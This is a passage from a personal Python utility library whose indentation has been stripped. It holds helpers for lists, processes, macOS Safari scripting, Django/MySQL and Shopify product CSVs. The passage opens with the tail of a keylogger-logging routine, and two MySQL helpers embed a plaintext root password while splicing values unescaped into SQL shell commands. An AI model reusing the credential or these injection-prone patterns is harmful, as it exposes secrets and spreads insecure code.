# num_lines = int(len(x)/2)
# y = x[:num_lines]
# open(homepath("~/hole/hole/keylogger/logfile.log"),"w").write("".join(y))
time.sleep(60)
ifdo(lambda:random.randrange(1,61) == 60,lambda:os.system("killall keylogger"))
generate_keylogger()
# return current_loads
def generate_one_alphabetical_string(size=10):
import string
w = (" ".join(string.ascii_letters)).split(" ")
x = ""
for i in range(size):
x += random.sample(w,1)[0]
return x
def generate_one_alphanumeric_string(size=10):
import string
w = (" ".join(string.ascii_letters)).split(" ") + list(map(str,list(range(10))))
x = ""
for i in range(size):
x += random.sample(w,1)[0]
return x
def generate_one_random_number(digits):
x = ""
while True:
x = x + str(random.choice(list(range(10))))
if len(x) == digits:
return x
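"""
Example: returns a string of exactly `digits` decimal digits (leading zeros possible):
len(generate_one_random_number(5)) == 5
"""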
def generator(x):
return (i for i in x)
def getattrs(attrs,x):
return [getattr(x,i) for i in attrs]
def getitems(items,x):
return [getitem(x,i) for i in items]
def getpass(x = None):
from getpass import getpass
return getpass()if(x==None)else(getpass(x))
def getsafarisource():
blueprint("Safari -> Advanced -> Show develop menu ; Develop -> Allow JavaScript from Apple Events")
x = subprocess.check_output("""osascript -e 'tell application "Safari" to set my_html to source of document 1'""",shell=True).decode("utf-8",errors="backslashreplace")
return x
def getsafariurl():
x = subprocess.getoutput("""osascript -e 'tell application "Safari" to set the_url to URL of current tab of window 1'""")
return x
def getuser():
import getpass
return getpass.getuser()
def getwindowcount(x):
return int(subprocess.getoutput("""osascript -e 'tell application "%s" to get (count of windows)'"""%x))
def get_active_shops():
return Filter(Shop,Active=True)
def get_chmod_statuses():
for i in os.listdir("/Applications"):
status = subprocess.getoutput("stat -f '%OLp' '/Applications/{}'".format(i))
print("%s: %s" % (i,status))
for i in os.listdir("/Applications/Utilities"):
status = subprocess.getoutput("stat -f '%OLp' '/Applications/Utilities/{}'".format(i))
print("%s: %s" % (i,status))
def get_dircount(path=None):
if path is None: path = os.path.expanduser('~/')+'Downloads'
return len(os.listdir(path))
def get_feed():
return get_user().remote_read(fields=["feed"]).export_all_data()["feed"]["data"]
def get_in_between_idx(new,x):
chosen_idx = None
for idx,i in enum(x[:-1]):
if new > i and new < x[idx+1]:
print(i,new,x[idx+1])
chosen_idx = idx
return chosen_idx
def get_one_address(directory,ext):
return os.path.join(directory,"x")+(".%s"%(ext))
def get_random_address(directory):
print("getting random address")
class x(str):
__init__ = lambda self, s: super().__init__()
png = lambda self: self.__add__(".png")
jpg = lambda self: self.__add__(".jpg")
jpeg = lambda self: self.__add__(".jpeg")
csv = lambda self: self.__add__(".csv")
mp4 = lambda self: self.__add__(".mp4")
txt = lambda self: self.__add__(".txt")
c = x(generate_one_random_number(10))
if c in lmap(lambda i: ".".join(i.split(".")[:-1]), os.listdir(directory)):
return get_random_address(directory)
c = x(os.path.join(directory,c))
return c
def get_random_address2(directory,ext):
x = random.randrange(10000000)
return os.path.join(directory,str(x))+".%s"%(ext)
def get_random_from_lists(*args):
firsts = args[:int(len(args)/2)]
x = []
x.append(firsts[0])
for idx,i in enum(firsts[1:]):
x.append(round(i+x[-1],2))
new = random.random()
x.insert(0,0)
"""
while True:
new = random.random()
for idx,i in enum(x[:-1]):
if new > i and new < x[idx+1]:
print(i,new,x[idx+1])
time.sleep(1)
"""
choices = args[int(len(args)/2):]
chosen_idx = get_in_between_idx(new,x)
chosen_choices = choices[chosen_idx]
return random.choice(chosen_choices)
def get_random_word():
from nltk.corpus import words
x = words.words()
word = random.choice(x)
return word
def get_lambda_name(l):
return get_source(l).split("=")[0].strip()
def get_latest_download(path=None,x=0):
import glob
if path is None: path = os.path.expanduser('~/')+'Downloads'
return sorted(glob.glob('%s/*' % path), key=os.path.getmtime, reverse=True)[x]
def get_product_url(x):
url = "https://%s/admin/products/%s"%(Get(Shop,shop_abbreviation="rom").Domain_Name,x.id)
return url
def get_size_of(x):
return sys.getsizeof(x)
def get_source(x):
from inspect import getsource
return getsource(x)
def getitem(*args):
return or_list(lambda:args[0].get(args[1],or_list(lambda:args[2],None)),lambda:or_list(lambda:args[0][args[1]],lambda:args[2]),lambda:(0/0))
def gl(x,a):
globals()[a] = x
"""
gl("5","test")
print(gx("test"))
"""
def gleb(x,y=1):
return (random.sample(x,1)[0])if(y==1)else(random.sample(x,y))
def globalise(x,a):
globals()[a] = x
def globe(x,*args):
return (globals().get(x,*args))if(args)else(globals().get(x))
def go_over(x,y):
x(y)
return y
"""
go_over(lambda i: print(i.a), AD(a=5))
"""
def got_ali_url():
existing = lmap(lambda i: re.findall("\d+\.html",i.ali_url)[0],Filter(Product,ali_url__icontains="aliexpress.com"))
urls_2 = lmap(lambda i: re.findall("\d+.html",i.url)[0],All(AddProduct))
now = re.findall("\d+\.html",get_first_chrome_url())[0]
if now in existing or now in urls_2:
print("index: %s"%(shuffled(existing+urls_2).index(now)))
print("now: %s" % now)
return True
def gx(x,*args):
return (globals().get(x,*args))if(args)else(globals().get(x))
def homepath(x):
import os
return os.path.expanduser("~%s"%(x.split("~")[1]))
def html_test(x):
open("test.html","w").write(str(x))
system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -p sele test.html &>/dev/null&")
def html_to_png(io):
address_1 = homepath("~/tavern/tavern/soda/dls/._%s_tmp.html"%(random.randrange(10000000,99999999)))
address_2 = homepath("~/tavern/tavern/soda/dls/._%s_out.png"%(random.randrange(10000000,99999999)))
try:
if os.path.exists(io):
io = io
else:
try:
try:open(address_1,"w",encoding="utf-8").write(io)
except:open(address_1,"wb",encoding="utf-8").write(io)
except Exception as v:
v
io = address_1
try:
os.system("""/usr/local/bin/wkhtmltoimage --disable-smart-width --javascript-delay 1000 --encoding utf-8 --load-error-handling ignore --load-media-error-handling ignore "%s" "%s" """%(address_1,address_2))
except Exception as w:
w
tryprocess(os.remove,address_1)
return address_2
except Exception as e:
e = str(e)
OSA.log("MIGHTY_ERROR: %s"%e)
return "MIGHTY ERROR"
def ifdo(x,y):
if x():
y()
"""
ifdo(lambda: 1==1, lambda: print(5))
ifdo(lambda: 1==2, lambda: print(5))
ifdo(lambda: [], lambda: print(5))
ifdo(lambda: True, lambda: print(5))
"""
def ifelseget(x,y,z):
if tryreturn(lambda:x()):
return y()
else:
return z()
"""
ifelseget(lambda: 1==1, lambda: print(5), lambda: print(4))
ifelseget(lambda: 1==2, lambda: print(5), lambda: print(4))
ifelseget(lambda: [], lambda: print(5), lambda: print(4))
ifelseget(lambda: True, lambda: print(5), lambda: print(4))
"""
def ifelselist(*args):
for i,j in zip(args[0::2],args[1::2]):
if i():
return j()
def ifget(x,y):
if tryreturn(lambda:x()):
return y()
def im2arr(fn):
import numpy as np
from PIL import Image
return np.array(Image.open(fn))
def images_to_column_xlsx(images,column="A",image_size=100,**stars):
import openpyxl
wb = ifelseget(lambda:stars["wb"],lambda:stars["wb"],lambda:openpyxl.Workbook())
ws = wb.worksheets[0]
ws.column_dimensions['A'].width = (image_size/8)
s = 1
for i in images:
img = openpyxl.drawing.image.Image(i)
img.anchor = '%s%s'%(column,s)
print('%s%s'%(column,s))
ws.add_image(img)
ws.row_dimensions[s].height = (image_size*0.75)
s += 1
wb.save('out.xlsx')
return wb
def impreview(address, speed=0.3):
if not os.path.exists(str(address)):
import cv2
os.makedirs(homepath("~/tavern/tavern/soda/dls"),exist_ok=True)
a = (homepath("~/tavern/tavern/soda/dls/%s.png"%(generate_one_alphanumeric_string(18))))
cv2.imwrite(a, address)
address = a
from PIL import Image
if os.path.isdir(address):
[[Image.open(os.path.join(address,fn)).show(), time.sleep(speed)] for fn in sorted(os.listdir(address))]
else:
Image.open(address).show()
def index(x, y):
try:return list(x).index(y)
except:return -1
def indicepick(x,y):
return [y[i] for i in x]
"""
indicepick([1,2,3], [1,2,3,4,5,6])
"""
def intcls(x,**kwargs):
return type("a",(int,),kwargs)(x)
"""
r = intcls(123,print = lambda self:print(self))
r.print()
"""
def intify(x):
return [int(i) if tp(lambda:int(i))==1 else i for i in x]
def itemcopy(a,b,f):
redprint("Temporary Guide For Cloning: Keyse, GeheadN+(A),(B),(F);A^!TAKES FROM B, ITER<F>.")
for zelish in f:
rhondousel = getattr(b, zelish, None)
setattr(a, zelish, rhondousel)
a.save()
return a
""" ::: Tests ::: """
"""
a = AttrDict()
b = All(Product)[0]
fields = ['size_chart', 'vendor', 'id', 'item_type']
itemcopy(a,b,fields)
"""
def iterindex(xy, lox):
x = []
for i in xy:
if i in lox:
x.append(lox.index(i))
return x
"""
xy = [0,1,2,3,4,5,6]
lox = [0,1,2,3,4,5,6,7,8,0,1,2,3]
print(iterindex(xy, lox))
xy = [0,1,2,3,4,5,6]
lox = [7]
print(iterindex(xy, lox))
"""
def key(dictlist, key):
if type(dictlist) is str or type(dictlist) is int:
dictlist, key = key, dictlist
try: return [getattr(i, key) for i in list(dictlist)]
except: return [i[key] for i in list(dictlist)]
def keyby(x,y):
return or_list(lambda:[i for i in y if x(i)],lambda:[i for i in y if x(*i)],[])
def keycall(key, dictlist, *args, **kwargs):
try: return [getattr(i, key)(*args, **kwargs) for i in list(dictlist)]
except: return [i[key](*args, **kwargs) for i in list(dictlist)]
def keycontains(key, contains, dictlist):
try: return [i for i in list(dictlist) if contains in i[key]]
except: return [i for i in list(dictlist) if contains in getattr(i, key)]
def keyequals(key, equals, data):
try: return [i for i in list(data) if i[key] == equals]
except: return [i for i in list(data) if getattr(i, key) == equals]
def keyicontains(key, icontains, dictlist):
try: return [i for i in list(dictlist) if icontains.lower() in i[key].lower()]
except: return [i for i in list(dictlist) if icontains.lower() in getattr(i, key).lower()]
def keymulti(keys, dictlist):
try: return [[getattr(a,b) for b in keys] for a in list(dictlist)]
except: return [[getitem(a,b) for b in keys] for a in list(dictlist)]
def keynicontains(key, nicontains, data, ):
try: return [i for i in list(data) if nicontains.lower() not in i[key].lower()]
except: return [i for i in list(data) if nicontains.lower() not in getattr(i, key).lower()]
def keyncontains(key, ncontains, data, ):
try: return [i for i in list(data) if ncontains not in i[key]]
except: return [i for i in list(data) if ncontains not in getattr(i, key)]
def keynequals(key, nequals, data, ):
try: return [i for i in list(data) if i[key] != nequals]
except: return [i for i in list(data) if getattr(i, key) != nequals]
def keynotequals(key, notequals, data, ):
try: return [i for i in list(data) if i[key] != notequals]
except: return [i for i in list(data) if getattr(i, key) != notequals]
def keysort(key, dictlist, tcer=True):
import operator
if type(key) is not list:
key = [key]
try: return sorted(list(dictlist), key=operator.itemgetter(*key), reverse=tcer)
except: return sorted(list(dictlist), key=operator.attrgetter(*key), reverse=tcer)
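"""
Example (sorts descending by default because tcer=True):
keysort("a", [{"a": 1}, {"a": 3}, {"a": 2}]) == [{'a': 3}, {'a': 2}, {'a': 1}]
keysort("a", [{"a": 1}, {"a": 3}, {"a": 2}], tcer=False) == [{'a': 1}, {'a': 2}, {'a': 3}]
"""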
def keysort_multi(columns, items, tcer=False):
from operator import itemgetter, attrgetter
from functools import cmp_to_key
comparers = None
if tryprocess(lambda:items[0].get(columns[0])): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]
else: comparers = [((attrgetter(col[1:].strip()), -1) if col.startswith('-') else (attrgetter(col.strip()), 1)) for col in columns]
def comparer(left, right):
def cmp(a, b):
if a == None and b == None: return 0
if a == None and b != None: return 1
if a != None and b == None: return -1
elif a != None and b != None: return (a > b) - (a < b)
comparer_iter = ( cmp(fn(left), fn(right)) * mult for fn, mult in comparers)
return next((result for result in comparer_iter if result), 0)
return sorted(list(items), key=cmp_to_key(comparer), reverse=tcer)
def kodo(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
(0/0)
def ldict(x=None):
return OrderedDict(x)if(x)else(OrderedDict())
def linspace(start, stop, precision, endpoint=False):
start, stop = round(float(start),2), round(float(stop),2)
roundpoint = len(str(precision).split(".")[-1])if(".") in str(precision) else 0
d = []
x = start
while True:
d.append(x)
x = x + precision
x = round(x, roundpoint)
if x == stop:
break
if endpoint == True:
d.append(x)
return d
"""
linspace(0.76, 1.01, 0.01)
"""
def list_and(*args):
from types import MethodType,ModuleType,FunctionType
latest = None
for idx, arg in enum(args):
if type(arg) == FunctionType or type(arg) == MethodType: arg = tryreturn(lambda:arg())
else: arg = args[idx]
latest = arg
if arg == False or arg == 0 or arg == None or arg == [] or arg == () or arg == "" or arg == b"": return latest
return latest
def listadd(*args):
x = []
for i in args:
if "append" not in dir(i):
i = [i]
x.extend(i)
return x
"""
listadd([1,2,3],[1,2,3],["a","b","c"],[[1,2,3]])
"""
def listinsert(x,l1,l2):
return l2[:x] + l1 + l2[x:]
"""
assert listinsert(1,[4,5,6],[1,2,3]) == [1,4,5,6,2,3,]
"""
def listmap(func, *args, **kwargs):
from functools import partial
return list(map( partial(func, **kwargs), *args ))
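# Illustrative usage (added example):
"""
assert listmap(lambda a, b: a + b, [1, 2], [10, 20]) == [11, 22]
"""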
def listminus(x,y=[],minus_once = False, **kwargs):
# puts [] into a list.
if "append" not in dir(y):
y = [y]
if minus_once == False:
return [i for i in x if i not in y and kwargs.get("method",lambda i:True)(i)]
else:
for i in y:
if i not in x:
continue
else:
R = x.index(i)
x.pop(R)
return x
"""
x = [2,1,2,1]
y = [1]
assert [2, 2] == listminus(x, y, minus_once = False)
assert [2, 2, 1] == listminus(x, y, minus_once = True)
"""
def listplus(x,y,z):
l = len(x)
for i in range(y-l):
x.append(z)
return x
'''
listplus([1,2,3],5,None)
'''
def listreplace(io, *args, **kwargs):
return [setitem(kwargs,"z",io),[setitem(kwargs,"z",[i if i != x else j for i in kwargs["z"]]) for x,j in zip(args[0::2],args[1::2])] ,kwargs["z"]][-1]
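# Illustrative usage (added example): pairs of (old, new) values are replaced in order; relies on the setitem helper defined later in this file.
"""
assert listreplace([1, 2, 3], 1, 9, 2, 8) == [9, 8, 3]
"""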
def listshift(start=None,x=None):
a = x[start]
x.__delitem__(start)
x = [a] + x
return x
"""
listshift(2,[1,2,3,4,5])
"""
def lmap(func, *args, **kwargs):
from functools import partial
arg_lens = oset([len(i) for i in args])
assert len(arg_lens) == 1
if arg_lens[0] == 0:
return []
# x = or_list(lambda:list(map( partial(func, **kwargs), *args )),
# lambda:list(map( partial(func, **kwargs), *[[i[idx] for i in args[0]] for idx in list(range(oset(list(map(len,args[0])))[0]))]) ),
# lambda: 0/0)
x = or_list(lambda:list(map( partial(func, **kwargs), *args )),
lambda:list(map( partial(func, **kwargs), *transpose(args[0]) )),
lambda:0/0)
ifdo(lambda:x==0,lambda:exec("assert False"))
return x
"""
assert lmap(lambda i,j: i+j, [(1,1),(2,2),(3,3)]) == [2, 4, 6]
assert lmap(lambda i: i+1, [1,2]) == [2, 3]
"""
def lrange(*args):
return list(range(args[0]))if(len(args)==1)else(list(range(args[0],args[1])))
def lset(x):
return list(set(x))
def loadpickles(*args,**kws):
ifdo(lambda:os.path.exists(args[0])==False,lambda:savepickles(kws['default'],args[0]) )
return pickle.load(open(args[0],'rb'))
def login_prompt():
OSA().log("Please log in. Then press OK. ʕ•́ᴥ•̀ʔ",tp=False)
def lsorted(x,**kwargs):
return sorted(x,key=kwargs.get("key",None),reverse=kwargs.get("tcer",False))
"""
lsorted([5,2,3],tcer=True)
lsorted([5,2,3],key=lambda i: i)
lsorted([5,2,3],key=lambda i: i,tcer=True)
"""
def make_archive(address):
import shutil
import zipfile
rm("%s.zip"%address)if(1==os.path.exists("%s.zip"%address))else(0)
shutil.make_archive(address, 'zip', address) if os.path.isdir(address) else zipfile.ZipFile("%s.zip"%address, mode="w").write(address)
return "%s.zip"%address
def methodsort(x, method, tcer=False):
return sorted(x, key=method, reverse=tcer)
def microsecondize(a,b):
c = (b-a)
d = c.seconds
v = c.microseconds / 1000000
f = (d)+(v)
return f
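# Illustrative usage (added example; assumes datetime is imported as elsewhere in this file):
"""
a = datetime(2020, 1, 1, 0, 0, 0, 0)
b = datetime(2020, 1, 1, 0, 0, 1, 500000)
assert microsecondize(a, b) == 1.5
"""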
def mig(*args,**kwargs):
SQL().migrate(*args,**kwargs)
def mkchdir(address):
os.makedirs(address, exist_ok=True)
os.chdir(address)
def msort(x, method, tcer=False):
return sorted(x, key=method, reverse=tcer)
def multi_input(printout):
distinct_print("====multi_input====:\n%s"%printout)
x = ""
while True:
y = input("")
if y[-2:] == "\Q":
y = y[:-2]
if y=="q":
return x
x += y
x += "\n"
def multiprocessing_process(target):
import multiprocessing
R = multiprocessing.Process(target = target)
R.start()
return R
def mysql_args_and_kwargs_to_string(*args, **kwargs):
import django
stuff = []
for i in args:
if type(i) == django.db.models.query_utils.Q:
x = i.children
for idx_0, a in enum(x):
x[idx_0] = list(a)
for idx,b in enum(x[idx_0]):
if b == True:
x[idx_0][idx] = "true"
elif b == False:
x[idx_0][idx] = "false"
for j in x:
if "__" in j[0]:
if "__icontains" in j[0]:
stuff.append("%s not like '%%%s%%'"%(j[0].split("__")[0],j[0].split("__")[1]))
else:
stuff.append("%s!='%s'"%(j[0],j[1]))
for a,b in kwargs.items():
        if b == True: b = "true"
        if b == False: b = "false"
if "__" in a:
if "__icontains" in a:
stuff.append("%s like '%%%s%%'"%(a.split("__")[0],b))
else:
stuff.append("%s='%s'"%(a,b))
stuff = "where" + " " + " and ".join(stuff)
return stuff
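# Illustrative usage (added example; relies on kwargs keeping insertion order, Python 3.7+):
"""
mysql_args_and_kwargs_to_string(title__icontains="shirt", vendor="Acme")
# expected: "where title like '%shirt%' and vendor='Acme'"
"""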
def mysql_delete(x):
""" This will work only if the id is an AutoField on any model with multiple unique fields. """
#t = ('/usr/local/bin/mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e """delete from %s_%s where id="%s";"""&>/dev/null ' % (Database, x._meta.verbose_name.replace(" ",""), x.id))
t = ("""/usr/local/bin/mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e "delete from %s_%s where id='%s';"&>/dev/null """ % (Database, x._meta.verbose_name.replace(" ",""), x.id))
#redprint(t)
os.system(t)
def mysql_exec(w="select count(*) from soda_timedtask;"):
x = subprocess.getoutput("""mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e "%s" """ % ((w+";")if(not w.endswith(";"))else(w))).split("\n")[1:]
x = [i.split("\t") for i in x]
headers = x.pop(0)
y = [dict(zip(headers, i)) for i in x]
return y
def ner_tagger(text):
from nltk.tag import StanfordNERTagger
from nltk.tokenize import word_tokenize
Binarydata().export("NER")
st = StanfordNERTagger('NER/english.all.3class.distsim.crf.ser.gz',
'NER/stanford-ner.jar',
encoding='utf-8')
tokenized_text = word_tokenize(text)
classified_text = st.tag(tokenized_text)
print(classified_text)
x = []
for i in classified_text:
if i[1]=='PERSON':
print(i)
x.append(i[0])
import shutil
shutil.rmtree("NER")
return x
def new_dict(x,fields=[]):
return AD({a:b for a,b in x.items() if a in fields})
def notentry(a,b):
if b not in globals():
globalise(a(),b)
return globals()[b]
"""
notentry(lambda:1,"b")
assert globe("b") == 1
"""
def notexists(x):
if x != False and x != 0 and x != None and x != [] and x != () and x != "" and x != b"":
return False
else:
return True
"""
notexists("")
"""
def nps_chat_reader():
from nltk.corpus import nps_chat
for i in nps_chat.xml_posts():
print(i.text)
x = input("")
if x == "quit":
break
return
def openr(address):
return open(address)
def openw(address):
return open(address, "w")
def openrb(address):
return open(address, "rb")
def openwb(address):
return open(address, "wb")
def ordered_json_dumps(x):
return json.dumps(OrderedDict([[a,str(x[a])] for a in list(sorted(x.keys())) if not a.startswith("_")]), indent=4)
def or_list(*args):
from types import MethodType,ModuleType,FunctionType
for idx, arg in enum(args):
if type(arg) == FunctionType or type(arg) == MethodType:
arg = tryreturn(lambda:arg())
if arg != False and arg != 0 and arg != None and arg != [] and arg != () and arg != "" and arg != b"":
return arg
if arg != False and arg != 0 and arg != None and arg != [] and arg != () and arg != "" and arg != b"":
return args[idx]
return (tryreturn(lambda:args[-1]()))if(type(args[-1])==FunctionType or type(args[-1])==MethodType)else(args[-1])
"""
or_list(tryreturn(lambda: 3/1), "a", None, 0,)
or_list(1,lambda:print(1),lambda:print(1))
or_list(lambda:print(1),1,lambda:print(1))
or_list(lambda:print(1),1)
or_list(0,ExecutableText().export("hello"),1)
or_list(0,lambda x=1: x)
"""
def oset(x, **kwargs):
y = []
for i in x:
if i not in y:
if i not in kwargs.get("minus",[]):
if kwargs.get("method",lambda i: True)(i) == True:
y.append(i)
return y
"""
assert oset([3,2,3,3,2]) == [3, 2]
assert oset([1,2,1,]) == [1,2]
assert oset([1,2,1,],method=lambda i: i!=1) == [2]
assert oset([1,2,1,],method=lambda i: i!=1,minus=[2]) == []
assert oset([1,2,1,],method=lambda i: i!=1,minus=[3]) == [2]
"""
def overlay_sound_files(sound_files):
from pydub import AudioSegment
sound_file = AudioSegment.from_file(sound_files[0])
for i in sound_files[1:]:
new_sound_file = AudioSegment.from_file(i)
sound_file = sound_file.overlay(new_sound_file)
sound_file.export(os.path.expanduser("~/Downloads/export.wav"), format='wav')
return os.path.expanduser("~/Downloads/export.wav")
def pathjoin(*args):
return os.path.join(*args)
def plusUpdate(x, **kwargs):
return [[setattr(x,a,getattr(x,a)+b) for a,b in kwargs.items()],x.save(),x][2]
def poll(o, x, step=8, poll_forever=True):
import polling
polling.poll(o, step=step, poll_forever=poll_forever)
x()
poll(o, x, step=step, poll_forever=poll_forever)
def pool(f, *args, nodes=12, **kwargs):
    # [ERRORFUL] if you call pool(ss.assert_connection_speed, "20MB"), pass it as minimum_speed=... instead; otherwise "20MB" is treated as the list you are pooling over.
results = type("list", (list,), dict(result=lambda self: [keycall("join",self),keycall("result",self)][1]))
results = results()
if args and len(args[0]) == 0: return results
    #@results() returns a list still full of "processing" entries and does not finish
    #@unless the results class keycalls join first (see the result lambda above).
#results = []
from inspect import getfullargspec
fullargspec = getfullargspec(f)
"""
defaults_len = tryreturn(len, fullargspec.defaults)
accountable_args = listminus(fullargspec.args, (["self"] + list(kwargs)), minus_once = True)
accountable_args_len = len(accountable_args) - defaults_len
if accountable_args_len == 0:
accountable_args_len = accountable_args_len - len(args)
"""
argcount = f.__code__.co_argcount
if "self" in fullargspec.args:
argcount = argcount - 1
accountable_args_len = argcount - (len(kwargs))
# [TESTING] magentaprint(accountable_args_len)
zilleum = 0
while True:
if keycall("result",results).count("processing") < nodes:
if accountable_args_len != 0:
#@ruined the args from before calling pool. results.append(process(f,*[a.pop(0) for a in args], **kwargs))
results.append(process(f,*[a[zilleum] for a in args], **kwargs))
zilleum+=1
elif accountable_args_len == 0:
results.append(process(f, **kwargs))
#def hi():
#@works. hi(**{})
else:
time.sleep(0.1)
#if len(args[0]) == 0:
if not args:
r = results[0]
r.join_saved = r.join
r.result_saved = r.result
def result(self):
self.join()
return self.result_saved()
            is_running = lambda self: self.is_alive()
bind3(r, result)
bind3(r, is_running)
return r
elif zilleum == len(args[0]):
# halts for say, args[0] is 11, nodes is 2.
return results
assert 1 == len(set(list(map(len, args))))
""" :Tests:
def x(self = 1, a = True, b = True, c = True):
return 1
a = pool(x) # argcount will come out as -1 if self is supplied on a function that is not bound to an instance
assert a.result() == 1
def x(y):
return 1
b = pool(x, [1, 2, 3])
assert [1, 1, 1] == b.result()
def x(y, z):
return (y + z)
c = pool(x, [1,2,3], [1,2,3])
assert [2, 4, 6] == c.result()
def x(y, multiplier = 5):
return 1 * multiplier
b = pool(x, [1, 2, 3], multiplier = 5)
assert [5, 5, 5] == b.result()
def x(y, multiplier):
return 1 * multiplier
b = pool(x, [5, 5, 5], multiplier = 5)
assert [5, 5, 5] == b.result()
def x(y, z, multiplier = 5):
return (y + z) * multiplier
c = pool(x, [1, 2, 3], [1, 2, 3], multiplier = 5)
assert [10, 20, 30] == c.result()
def x(y, z, multiplier):
return (y + z) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
def x(y, z, multiplier, multiplier_2):
return (y + z) * multiplier * multiplier_2
c = pool(x, [1,2,3], [1,2,3], multiplier = 5, multiplier_2 = 5)
assert [50, 100, 150] == c.result()
x = lambda: 1
c = pool(x)
assert 1 == c.result()
x = lambda x: 1
c = pool(x, [1,2,3])
assert [1, 1, 1] == c.result()
x = lambda x, y: x + y
c = pool(x, [1,2,3], [1,2,3])
assert [2, 4, 6] == c.result()
x = lambda x, y, multiplier = 5: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
x = lambda x, y, multiplier: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
x = lambda x, y, multiplier = 5: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3])
assert [10, 20, 30] == c.result()
def x(self, a = True, b = True, c = True):
return 1
c = pool(x, [1,2,3])
assert [1, 1, 1] == c.result()
# If you find any more issues, add the tests here.
# Idea [IGNORE]: "accountable args" meant arguments for which no keywords were supplied; with 0 accountable args you have only keywords, and defaults subtract the count down to 0 unless there are no keywords at all, in which case it is still 0 accountable args, i.e. pool(lambda: 1).
# Idea: Actually, the only thing that mattered was whether the clean argument count was 0, so a length was needed: take co_argcount (all params, minus 1 for self) and subtract all kwargs; all params minus all kwargs leaves all positional arguments.
# tldr. if 0 == ALL PARAMS - ALL KWARGS (== ALL POSITIONAL ARGUMENTS), then it's the pool(lambda: 1) case, which will work.
"""
def popen(cmd):
return Popen(cmd.split(' '),shell=False,stdin=None, stdout=None, stderr=None, close_fds=True)
def popwhere(key, keyequals, dictlist):
[ setitem(g(),"indexes",[]) , [g()["indexes"].append(idx)if(keyequals== (getattr(i,key) if("~~~"!=getattr(i,key,"~~~")) else(i.get(key)) )) else(None) for idx, i in enum(dictlist)] ]
assert len(g()["indexes"]) == 1
dictlist.pop(g()["indexes"].pop())
return dictlist
"""
class Test():
def __init__(self):
self.a = "b"
self.c = "d"
class Test2():
def __init__(self):
self.a = "c"
self.c = "b"
dictlist = [Test(),Test2()]
popwhere("a","b",dictlist)
class Test():
def __init__(self):
self.a = "b"
self.c = "d"
class Test2():
def __init__(self):
self.a = "b"
self.c = "b"
dictlist = [Test(),Test2()]
try:popwhere("a","b",dictlist)
except:print("expected error")
"""
def process(func, *args, start_process=1, **kwargs):
import multiprocessing
process_id = str(generate_one_random_number(20))
while process_id in globals():
process_id = str(generate_one_random_number(20))
globals()[process_id] = "processing"
def new_func(func, *args, **kwargs):
globals()[process_id] = func(*args,**kwargs)
def strand(func, *args, start_process=1, **kwargs):
from threading import Thread
t = Thread(target=func, args=args, kwargs=kwargs)
t.start()if(start_process==1)else(1)
return t
x = strand(new_func, *tuple([func] + list(args)), start_process=start_process, **kwargs)
x.globals = globals
x.process_id = process_id
def result(self):
return self.globals()[self.process_id]
bind3(x, result)
def tmp(self):
while self.is_alive() == True:
time.sleep(1)
return self.globals()[self.process_id]
bind3(x, tmp)
return x
def process_(func, *args, start_process=1, **kwargs):
import multiprocessing
p = multiprocessing.Process(target=func,*args,**kwargs)
if(1==start_process):p.start()
return p
def productcsv(sku_image_dict=None,shop=None,images=None,options=None,variants=None,title=None,product_type=None,tags=None,description=None,):
{'Body (HTML)': 'Cute but funny',
'Handle': 'feel-the-force-decor',
'Image Alt Text': '',
'Image Position': '1',
'Image Src': '',
'Option1 Name': 'Color',
'Option1 Value': 'Black',
'Option2 Name': '',
'Option2 Value': '',
'Option3 Name': '',
'Option3 Value': '',
'Tags': '1, test',
'Title': 'Feel The Force Decor',
'Type': 'test',
'Variant Compare At Price': '14.95',
'Variant Grams': '0',
'Variant Image': '',
'Variant Inventory Qty': '1494',
'Variant Price': '9.95',
'Variant SKU': "['sku-1-193']",
'Vendor': 'Epic Life Shop'}
{
'Gift Card': 'false', #
'Google Shopping / AdWords Grouping': '', #
'Google Shopping / AdWords Labels': '', #
'Google Shopping / Age Group': '', #
'Google Shopping / Condition': '', #
'Google Shopping / Custom Label 0': '', #
'Google Shopping / Custom Label 1': '', #
'Google Shopping / Custom Label 2': '', #
'Google Shopping / Custom Label 3': '', #
'Google Shopping / Custom Label 4': '', #
'Google Shopping / Custom Product': '', #
'Google Shopping / Gender': '', #
'Google Shopping / Google Product Category': '', #
'Google Shopping / MPN': '', #
'Published': 'true', #
'SEO Description': '', #
'SEO Title': '', #
'Variant Barcode': '', #
'Variant Fulfillment Service': 'manual', #
'Variant Inventory Policy': 'deny', #
'Variant Inventory Tracker': 'shopify', #
'Variant Requires Shipping': 'true', #
'Variant Tax Code': '', #
'Variant Taxable': 'true', #
'Variant Weight Unit': 'kg', #
}
"""Handle Option1 Value Option2 Value Option3 Value Variant SKU Variant Grams Variant Inventory Tracker Variant Inventory Qty Variant Inventory Policy Variant Fulfillment Service Variant Price Variant Compare At Price Variant Requires Shipping Variant Taxable Image Src Image Position
Handle Title Body (HTML) Vendor Type Tags Published Option1 Name Option2 Name Option3 Name Image Src Variant Image"""
headers = \
['Handle',
'Title',
'Body (HTML)',
'Vendor',
'Type',
'Tags',
'Published',
'Option1 Name',
'Option1 Value',
'Option2 Name',
'Option2 Value',
'Option3 Name',
'Option3 Value',
'Variant SKU',
'Variant Grams',
'Variant Inventory Tracker',
'Variant Inventory Qty',
'Variant Inventory Policy',
'Variant Fulfillment Service',
'Variant Price',
'Variant Compare At Price',
'Variant Requires Shipping',
'Variant Taxable',
'Variant Barcode',
'Image Src',
'Image Position',
'Image Alt Text',
'Gift Card',
'SEO Title',
'SEO Description',
'Google Shopping / Google Product Category',
'Google Shopping / Gender',
'Google Shopping / Age Group',
'Google Shopping / MPN',
'Google Shopping / AdWords Grouping',
'Google Shopping / AdWords Labels',
'Google Shopping / Condition',
